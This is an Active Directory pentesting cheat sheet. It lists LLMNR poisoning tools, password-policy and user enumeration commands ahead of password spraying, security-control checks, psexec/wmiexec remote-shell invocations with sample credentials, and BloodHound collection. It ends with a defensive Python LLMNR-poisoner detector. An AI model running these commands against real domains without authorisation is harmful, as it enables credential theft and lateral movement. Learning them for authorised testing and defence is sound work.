Attack AD
LLMNR/NBT-NS poisoning
Tools
- Responder
Needed ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389, TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141, TCP 25, TCP 110, TCP 587, TCP 3128, multicast UDP 5355 and 5353
- Inveigh (Good for console mode with escape key)
Two versions, compiled and PS1; the PS1 version is deprecated
- Metasploit
- Hashcat, once hashes have been captured
Password spraying
Enumerating the password policy:
- Crackmapexec
- Netexec
- rpcclient > querydominfo
- enum4linux
- ldapsearch
- PowerView
crackmapexec smb 192.168.1.0/24 -u '' -p '' --pass-pol
netexec smb 10.0.0.15 -u Administrator -p Password123 -d DOMAIN -x "net accounts /domain"
rpcclient -U "DOMAIN\\Administrator%Password123" 10.0.0.15 \
-c querydominfo
enum4linux -a 10.0.0.15
ldapsearch -x \
-H ldap://10.0.0.15 \
-D "CN=Administrator,CN=Users,DC=domain,DC=com" \
-w Password123 \
-b "DC=domain,DC=com" -s base \
"(objectClass=*)" minPwdLength minPwdAge maxPwdAge pwdHistoryLength pwdProperties lockoutThreshold lockoutDuration lockOutObservationWindow
The default domain policy is stored as attributes of the domain root object; fine-grained policies (PSOs) live under CN=Password Settings Container,CN=System,DC=domain,DC=com.
Import-Module ./PowerView.ps1
Get-DomainPasswordPolicy
Building a target user list
Wordlist
OSINT
- linkedin2username
Tools
- enum4linux
- netexec
- crackmapexec
- windapsearch
- kerbrute
python3 linkedin2username.py -c "Acme Corp" -n acme.com -d 2 -o acme_usernames.txt
enum4linux -U 10.10.0.5
netexec smb 10.10.0.252 -u Administrator -p 'Passw0rd!' -d DOMAIN -x "net user /domain"
crackmapexec smb 10.10.0.0/24 -u svc_scan -p 'P@ssw0rd123' --users
windapsearch.py -d example.com -u 'EXAMPLE\ldapbind' -p 'BindP@ss!' -U
kerbrute userenum -d example.com usernames.txt
Enumerating security controls
Defender
Get-MpComputerStatus
AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
PowerShell
$ExecutionContext.SessionState.LanguageMode
LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers
Remote shell
PSExec
Must drop an exe on the target to open a shell; the user must be a local admin
psexec.py [DOMAIN]/[USER]:[PWD]@[IP]
WMIExec
Uses WMI commands to launch a cmd.exe
wmiexec.py [DOMAIN]/[USER]:[PWD]@[IP]
Shortest path
BloodHound | RustHound
sudo rusthound -u [USER] -p [PWD] -ns [IP] -d [DOMAIN] -c all
Glossary
- LLMNR (Link Local Multicast Name Resolution | UDP:5355) / NBT-NS (NetBIOS Name Service | UDP:137): fallback name-resolution services that let hosts identify each other when DNS fails
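A defensive check that follows from the glossary entry above, added here as an example and not part of the original notes: it multicasts an LLMNR query for a name nobody owns, so a healthy network stays silent and any answer points at a poisoner. The wire format follows RFC 4795 (DNS-style header, question and A record); the function names, the bogus-name prefix and the 2-second timeout are this example's own choices.

```python
# Added defensive example (not from the original notes): find an LLMNR poisoner by querying a bogus name.
import os
import socket
import struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port
def build_query(name, txid):
    """LLMNR A query: 12-byte header with QDCOUNT=1, labels, QTYPE=1, QCLASS=1."""
    labels = b"".join(bytes([len(p)]) + p.encode() for p in name.split("."))
    return struct.pack("!6H", txid, 0, 1, 0, 0, 0) + labels + b"\x00\x00\x01\x00\x01"

def _read_name(data, off):
    """Decode DNS-style labels at off, following a compression pointer if present."""
    parts = []
    while (n := data[off]) != 0:
        if n & 0xC0 == 0xC0:                      # pointer: 0b11 + 14-bit offset
            tail, _ = _read_name(data, struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF)
            return ".".join(parts + [tail]), off + 2
        parts.append(data[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(parts), off + 1

def parse_answer(data, query):
    """(name, ipv4) if data answers query (same id, QR bit, echoed question, an A record), else None."""
    flags, an = struct.unpack("!HH", data[2:4] + data[6:8])
    if data[:2] != query[:2] or not flags & 0x8000 or data[12:len(query)] != query[12:] or an == 0:
        return None
    name, off = _read_name(data, len(query))
    rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    if rtype != 1 or rdlen != 4:
        return None
    return name, socket.inet_ntoa(data[off + 10:off + 14])

def probe(timeout=2.0):
    """Send one bogus-name query; return (sender_ip, name, answered_ip) for every reply."""
    query = build_query("chk-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big"))
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(1024)
            if ans := parse_answer(data, query):
                hits.append((src, *ans))
    except socket.timeout:
        return hits

if __name__ == "__main__":
    for src, name, ip in probe():
        print(f"LLMNR poisoner suspected: {src} answered {name} -> {ip}")
```

Run it from a workstation on the segment under review; repeat it per VLAN, since LLMNR does not cross routers.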